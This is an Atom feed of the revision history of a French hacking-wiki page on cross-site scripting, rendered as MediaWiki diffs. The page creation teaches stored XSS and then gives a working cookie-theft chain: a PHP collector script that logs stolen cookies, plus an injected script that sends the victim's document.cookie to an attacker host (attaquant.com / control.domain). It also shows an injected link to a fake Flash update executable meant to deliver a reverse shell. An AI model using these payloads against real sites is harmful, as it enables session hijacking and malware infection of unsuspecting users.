https://wiki.hackbbs.org/index.php?action=history&feed=atom&title=Web%3ACross-Site_Scripting_-_XSS
Web:Cross-Site Scripting - XSS - Historique des versions
2026-05-11T15:18:59Z
Historique des versions pour cette page sur le wiki
MediaWiki 1.42.0-alpha
https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&diff=93698&oldid=prev
Neib le 9 janvier 2024 à 01:20
2024-01-09T01:20:56Z
<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="fr">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Version précédente</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version du 9 janvier 2024 à 03:20</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l53">Ligne 53 :</td>
<td colspan="2" class="diff-lineno">Ligne 53 :</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">[[Category:Hacking]][[Category:Web]]</ins></div></td></tr>
</table>
Neib
https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&diff=93662&oldid=prev
Neib : Neib a déplacé la page Cross-Site Scripting - XSS vers Web:Cross-Site Scripting - XSS sans laisser de redirection
2024-01-06T13:45:29Z
<p>Neib a déplacé la page <a href="/index.php?title=Cross-Site_Scripting_-_XSS&action=edit&redlink=1" class="new" title="Cross-Site Scripting - XSS (page inexistante)">Cross-Site Scripting - XSS</a> vers <a href="/index.php/Web:Cross-Site_Scripting_-_XSS" title="Web:Cross-Site Scripting - XSS">Web:Cross-Site Scripting - XSS</a> sans laisser de redirection</p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<tr class="diff-title" lang="fr">
<td colspan="1" style="background-color: #fff; color: #202122; text-align: center;">← Version précédente</td>
<td colspan="1" style="background-color: #fff; color: #202122; text-align: center;">Version du 6 janvier 2024 à 15:45</td>
</tr><tr><td colspan="2" class="diff-notice" lang="fr"><div class="mw-diff-empty">(Aucune différence)</div>
</td></tr></table>
Neib
https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&diff=93549&oldid=prev
OldNeib : Neib a déplacé la page Cross-Site Scipting - XSS vers Cross-Site Scripting - XSS
2023-12-02T15:36:06Z
<p>Neib a déplacé la page <a href="/index.php?title=Cross-Site_Scipting_-_XSS&action=edit&redlink=1" class="new" title="Cross-Site Scipting - XSS (page inexistante)">Cross-Site Scipting - XSS</a> vers <a href="/index.php?title=Cross-Site_Scripting_-_XSS&action=edit&redlink=1" class="new" title="Cross-Site Scripting - XSS (page inexistante)">Cross-Site Scripting - XSS</a></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<tr class="diff-title" lang="fr">
<td colspan="1" style="background-color: #fff; color: #202122; text-align: center;">← Version précédente</td>
<td colspan="1" style="background-color: #fff; color: #202122; text-align: center;">Version du 2 décembre 2023 à 17:36</td>
</tr><tr><td colspan="2" class="diff-notice" lang="fr"><div class="mw-diff-empty">(Aucune différence)</div>
</td></tr></table>
OldNeib
https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&diff=93538&oldid=prev
OldNeib : /* Cheat Sheet */
2023-12-02T14:10:54Z
<p><span dir="auto"><span class="autocomment">Cheat Sheet</span></span></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="fr">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Version précédente</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version du 2 décembre 2023 à 16:10</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l51">Ligne 51 :</td>
<td colspan="2" class="diff-lineno">Ligne 51 :</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>= Cheat Sheet =</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>= Cheat Sheet =</div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection</ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</div></td></tr>
</table>
OldNeib
https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&diff=93537&oldid=prev
OldNeib : /* Exemple de récupération de cookies */
2023-12-02T14:09:13Z
<p><span dir="auto"><span class="autocomment">Exemple de récupération de cookies</span></span></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="fr">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Version précédente</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version du 2 décembre 2023 à 16:09</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l33">Ligne 33 :</td>
<td colspan="2" class="diff-lineno">Ligne 33 :</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>*La victime doit maintenant accéder à notre page:</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>*La victime doit maintenant accéder à notre page:</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> " /><script>document.location="http://attaquant.com/<del style="font-weight: bold; text-decoration: none;">get</del>.php?v=" + document.cookie;</script><p class="</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div> " /><script>document.location="http://attaquant.com/<ins style="font-weight: bold; text-decoration: none;">getCookie</ins>.php?v=" + document.cookie;</script><p class="</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br></td></tr>
</table>
OldNeib
https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&diff=93536&oldid=prev
OldNeib : Page créée avec « = Présentation = Cette vulnérabilité est possible lorsqu'une valeur qui peut être contrôlée par l'utilisateur est injectée dans une page web sans suffisamment de contrôles, et que cette valeur peut être du code HTML ou JavaScript valide, qui sera alors interprété par le navigateur. Imaginons un site où il serait possible d'uploader une image. Nous envoyons donc une image avec comme nom: <b>lapin.jpg</b> et comme description: <b>Oh! Trop mignon!</b>.... »
2023-12-02T14:08:42Z
<p>Page créée avec « = Présentation = Cette vulnérabilité est possible lorsqu'une valeur qui peut être contrôlée par l'utilisateur est injectée dans une page web sans suffisamment de contrôles, et que cette valeur peut être du code HTML ou JavaScript valide, qui sera alors interprété par le navigateur. Imaginons un site où il serait possible d'uploader une image. Nous envoyons donc une image avec comme nom: <b>lapin.jpg</b> et comme description: <b>Oh! Trop mignon!</b>.... »</p>
<p><b>Nouvelle page</b></p><div>= Présentation =<br />
Cette vulnérabilité est possible lorsqu'une valeur qui peut être contrôlée par l'utilisateur est injectée dans une page web sans suffisamment de contrôles, et que cette valeur peut être du code HTML ou JavaScript valide, qui sera alors interprété par le navigateur.<br />
<br />
Imaginons un site où il serait possible d'uploader une image. Nous envoyons donc une image avec comme nom: <b>lapin.jpg</b> et comme description: <b>Oh! Trop mignon!</b>.<br />
<br />
La page retournée nous renverrait alors l'image sous la forme:<br />
<br />
<img src="./lapin.jpg" title="Oh! Trop mignon!" /><br />
<br />
Un cas classique d'exploitation serait de remplacer la description: <b>Oh! Trop mignon!</b> par: <b>" /><script>alert('Hacked!');</script><p class="</b>.<br />
<br />
Le site nous retournerait alors:<br />
<br />
<img src="./lapin.jpg" title="" /><script>alert('Hacked!');</script><p class="" /><br />
<br />
<br />
Ce code HTML étant valide, notre JavaScript sera exécuté au sein du navigateur.<br />
<br />
En se débrouillant pour faire afficher cette image à un autre utilisateur, le code s'exécutera cette fois ci dans son navigateur. Il est ainsi possible de récupérer certaines informations sensibles ou alors de faire exécuter quelque action depuis le navigateur de notre cible.<br />
<br />
Ici, comme le code injecté est enregistré par le serveur via notre image, quiconque se rendra sur la page où notre image est enregistré se verra exécuter notre script.<br />
<br />
<br />
= Éxploitation =<br />
== Exemple de récupération de cookies ==<br />
*Préparation du fichier <b>getCookie.php</b>. Celui-ci devra être enregistré de façon `pouvoir être consulté depuis le navigateur de notre cible.<br />
<br />
<?php<br />
$cookie = $_GET['v'] . "\n";<br />
file_put_contents("cookies.txt", $cookie, FILE_APPEND | LOCK_EX);<br />
?><br />
<br />
*La victime doit maintenant accéder à notre page:<br />
<br />
" /><script>document.location="http://attaquant.com/get.php?v=" + document.cookie;</script><p class="<br />
<br />
<br />
La page contenant l'image deviendra alors:<br />
<br />
<img src="./lapin.jpg" title="" /><script>document.location="http://control.domain/get.php?v=" + document.cookie;</script><p class="" /><br />
<br />
Une fois arrivé sur la page piégée, l'utilisateur sera redirigé vers notre page avec ses cookies en paramètre. Cookies qui seront enregistrés dans un fichier nommé <b>cookie.txt</b><br />
<br />
== Social Engineering ==<br />
Un exemple d'attaque à adapter selon son imagination:<br />
*Création d'un exécutable type [[Reverse Shell]] ou autre.<br />
*Simulation d'un plugin manquant pour lire ou exécuter un contenu sur le navigateur de notre victime. Ex: "Pour continuer, Flash Player doit être mis à jour." + image utilisée lorsqu'un plugin est réellement manquant.<br />
*Téléchargement de notre faux plugin par la victime, puis exécution.<br />
<br />
" /> <a href="http://control.domain/flash_update.exe"><img src="http://control.domain/flash.png" /></a> <p alt="<br />
<br />
= Cheat Sheet =<br />
*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</div>
OldNeib